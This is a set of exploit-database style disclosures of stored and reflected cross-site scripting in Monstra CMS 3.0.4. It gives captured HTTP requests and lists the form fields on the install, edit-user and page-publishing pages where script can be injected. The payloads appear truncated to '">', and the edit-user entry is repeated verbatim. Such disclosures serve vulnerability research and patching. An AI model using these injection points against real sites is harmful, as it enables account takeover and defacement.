# Exploit Title: [ Stored XSS at Monstra CMS 3.0.4 Install Page ] # Date: [20.05.2018] # Exploit Author: [Ismail Tasdelen] # Vendor Homepage: [http://monstra.org/] # Software Link: [ Monstra CMS ] # Version: Monstra CMS 3.0.4 # Tested on: Windows 10 / Debian - XAMMP Web Server # PoC : https://www.youtube.com/watch?v=AQweKapFzjI # Stored XSS Payload : "> # General : Request URL: http://localhost/monstra-3.0.4/install.php?action=install Request Method: POST Status Code: 302 Found Remote Address: [::1]:80 Referrer Policy: no-referrer-when-downgrade # Response Headers : Cache-Control: no-store, no-cache, must-revalidate Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Date: Mon, 21 May 2018 11:42:57 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Keep-Alive: timeout=5, max=100 location: index.php?install=done Pragma: no-cache Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10 Transfer-Encoding: chunked X-Powered-By: PHP/7.1.10 # Request Headers : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 397 Content-Type: application/x-www-form-urlencoded Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v Host: localhost Origin: http://localhost Referer: http://localhost/monstra-3.0.4/install.php?action=install Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36 # Query String Parametres : action: install # Form Data : php: simplexml: mod_rewrite: install: sitemap: htaccess: public: storage: backups: tmp: sitename: "> siteurl: "> login: "> password: 123456 timezone: Kwajalein email: test@ismailtasdelen.me install_submit: Install ----------------------------- # Exploit Title: [ Reflected XSS at Monstra CMS 3.0.4 Edit User Page ] # Date: [20.05.2018] # Exploit Author: [Ismail Tasdelen] # Vendor Homepage: [http://monstra.org/] # Software Link: [ Monstra CMS ] # Version: Monstra CMS 3.0.4 # Tested on: Windows 10 / Debian - XAMMP Web Server # PoC : https://www.youtube.com/watch?v=_79BdaaPAuc # Reflected XSS Payload : "> # General : Request URL: http://localhost/monstra-3.0.4/users/1/edit Request Method: POST Status Code: 302 302 Found Remote Address: [::1]:80 Referrer Policy: no-referrer-when-downgrade # Response Headers : Cache-Control: no-store, no-cache, must-revalidate Connection: Keep-Alive Content-Length: 3028 Content-Type: text/html; charset=UTF-8 Date: Mon, 21 May 2018 11:59:34 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Keep-Alive: timeout=5, max=99 Location: http://localhost/monstra-3.0.4/users/1 Pragma: no-cache Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10 X-Powered-By: PHP/7.1.10 # Request Headers : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 668 Content-Type: application/x-www-form-urlencoded Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v; _gid=GA1.1.1813213397.1526902993 Host: localhost Origin: http://localhost Referer: http://localhost/monstra-3.0.4/users/1/edit Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36 # Form Data : csrf: 0542822c00801b440a8b47e941509f6aeec6e0be user_id: 1 login: "> firstname: "> lastname: "> email: "> twitter: "> skype: "> about_me: "> new_password: "> edit_profile: Save ----------------------------- # Exploit Title: [ Reflected XSS at Monstra CMS 3.0.4 Edit User Page ] # Date: [20.05.2018] # Exploit Author: [Ismail Tasdelen] # Vendor Homepage: [http://monstra.org/] # Software Link: [ Monstra CMS ] # Version: Monstra CMS 3.0.4 # Tested on: Windows 10 / Debian - XAMMP Web Server # PoC : https://www.youtube.com/watch?v=_79BdaaPAuc # Reflected XSS Payload : "> # General : Request URL: http://localhost/monstra-3.0.4/users/1/edit Request Method: POST Status Code: 302 302 Found Remote Address: [::1]:80 Referrer Policy: no-referrer-when-downgrade # Response Headers : Cache-Control: no-store, no-cache, must-revalidate Connection: Keep-Alive Content-Length: 3028 Content-Type: text/html; charset=UTF-8 Date: Mon, 21 May 2018 11:59:34 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Keep-Alive: timeout=5, max=99 Location: http://localhost/monstra-3.0.4/users/1 Pragma: no-cache Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10 X-Powered-By: PHP/7.1.10 # Request Headers : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 668 Content-Type: application/x-www-form-urlencoded Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v; _gid=GA1.1.1813213397.1526902993 Host: localhost Origin: http://localhost Referer: http://localhost/monstra-3.0.4/users/1/edit Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36 # Form Data : csrf: 0542822c00801b440a8b47e941509f6aeec6e0be user_id: 1 login: "> firstname: "> lastname: "> email: "> twitter: "> skype: "> about_me: "> new_password: "> edit_profile: Save ----------------------------- # Exploit Title: [ Stored XSS at Monstra CMS 3.0.4 Page Publishing Page ] # Date: [20.05.2018] # Exploit Author: [Ismail Tasdelen] # Vendor Homepage: [http://monstra.org/] # Software Link: [ Monstra CMS ] # Version: Monstra CMS 3.0.4 # Tested on: Windows 10 / Debian - XAMMP Web Server # PoC : https://www.youtube.com/watch?v=j62EBTErvuU # Stored XSS Payload : "> # General : Request URL: http://localhost/monstra-3.0.4/admin/index.php?id=pages&action=add_page Request Method: POST Status Code: 302 302 Found Remote Address: [::1]:80 Referrer Policy: no-referrer-when-downgrade # Response Headers : Cache-Control: no-store, no-cache, must-revalidate Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Date: Mon, 21 May 2018 12:11:49 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Keep-Alive: timeout=5, max=100 Location: index.php?id=pages Pragma: no-cache Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10 Transfer-Encoding: chunked X-Powered-By: PHP/7.1.10 # Request Headers : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 518 Content-Type: application/x-www-form-urlencoded Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v; _gid=GA1.1.1813213397.1526902993 Host: localhost Origin: http://localhost Referer: http://localhost/monstra-3.0.4/admin/index.php?id=pages&action=add_page Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36 # Query String Parametres : id: pages action: add_page # Form Data : csrf: 0542822c00801b440a8b47e941509f6aeec6e0be page_title: "> page_name: "> page_meta_title: page_keywords: page_description: pages: 0 templates: index status: published access: public editor: "> page_tags: "> add_page_and_exit: Save and Exit page_date: 2018-05-22 00:11:1 # You want to follow my activity ? https://www.linkedin.com/in/ismailtasdelen https://github.com/ismailtasdelen https://twitter.com/ismailtsdln